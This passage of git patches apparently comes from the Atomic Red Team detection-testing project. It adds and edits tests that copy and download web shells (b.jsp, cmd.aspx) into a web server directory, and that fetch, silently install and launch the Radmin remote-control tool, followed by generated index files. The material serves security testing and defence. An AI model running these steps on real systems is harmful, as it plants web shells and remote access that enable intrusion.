2>&1 name: command_prompt T1546.003: technique: diff --git a/atomics/T1505.003/T1505.003.md b/atomics/T1505.003/T1505.003.md index 5749d721..d10a868f 100644 --- a/atomics/T1505.003/T1505.003.md +++ b/atomics/T1505.003/T1505.003.md @@ -32,12 +32,14 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/ ```cmd -xcopy #{web_shells} #{web_shell_path} +xcopy /I /Y #{web_shells} #{web_shell_path} ``` #### Cleanup Commands: ```cmd -del #{web_shell_path} /q >nul 2>&1 +del #{web_shell_path}\b.jsp /q >nul 2>&1 +del #{web_shell_path}\tests.jsp /q >nul 2>&1 +del #{web_shell_path}\cmd.aspx /q >nul 2>&1 ``` @@ -52,7 +54,7 @@ if (Test-Path #{web_shells}) {exit 0} else {exit 1} ```powershell New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" -Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp" Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" ``` From 262f16a69f5602513d0c62184de11568bffcec9f Mon Sep 17 00:00:00 2001 From: tlor89 <60741301+tlor89@users.noreply.github.com> Date: Wed, 23 Jun 2021 11:31:11 -0500 Subject: [PATCH 60/84] T1072 (#1527) Co-authored-by: Toua Lor Co-authored-by: Carrie Roberts --- atomics/T1072/T1072.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 atomics/T1072/T1072.yaml diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml new file mode 100644 index 00000000..fa89473e --- /dev/null +++ b/atomics/T1072/T1072.yaml @@ -0,0 +1,33 @@ +attack_technique: T1072 +display_name: Software Deployment Tools +atomic_tests: +- name: Radmin Viewer Utility + description: | + An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. + supported_platforms: + - windows + input_arguments: + radmin_installer: + description: Radmin Viewer installer + type: Path + default: '%TEMP%\RadminViewer.msi' + radmin_exe: + description: The radmin.exe executable from RadminViewer.msi + type: Path + default: '%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe' + + dependencies: + - description: | + Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) + prereq_command: | + if not exist "#{radmin_exe}" (exit /b 1) + get_prereq_command: | + echo Downloading radmin installer + bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} + msiexec /i "#{radmin_installer}" /qn + + executor: + name: command_prompt + elevation_required: true + command: | + "#{radmin_exe}" \ No newline at end of file From ee20a80a3d48225d473a32bba28b4850cd46d2ca Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 23 Jun 2021 16:31:35 +0000 Subject: [PATCH 61/84] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1072/T1072.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml index fa89473e..cecdcede 100644 --- a/atomics/T1072/T1072.yaml +++ b/atomics/T1072/T1072.yaml @@ -2,6 +2,7 @@ attack_technique: T1072 display_name: Software Deployment Tools atomic_tests: - name: Radmin Viewer Utility + auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 description: | An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index ba1c4cac..d6e53f28 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -721,3 +721,4 @@ d546a3d9-0be5-40c7-ad82-5a7d79e1b66b 812c3ab8-94b0-4698-a9bf-9420af23ce24 afedc8c4-038c-4d82-b3e5-623a95f8a612 c99a829f-0bb8-4187-b2c6-d47d1df74cab +b4988cad-6ed2-434d-ace5-ea2670782129 From 8825813c53c0b22a726cad8558163ddfae9c8a7e Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 23 Jun 2021 16:31:41 +0000 Subject: [PATCH 62/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 2 + atomics/Indexes/Indexes-CSV/windows-index.csv | 2 + atomics/Indexes/Indexes-Markdown/index.md | 6 +- .../Indexes/Indexes-Markdown/windows-index.md | 6 +- atomics/Indexes/Matrices/matrix.md | 4 +- atomics/Indexes/Matrices/windows-matrix.md | 4 +- atomics/Indexes/index.yaml | 72 ++++++++++++++++++- atomics/T1072/T1072.md | 57 +++++++++++++++ 10 files changed, 145 insertions(+), 12 deletions(-) create mode 100644 atomics/T1072/T1072.md diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index 94952e5e..1b23e51b 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1072","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 9444f3fc..e607a440 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 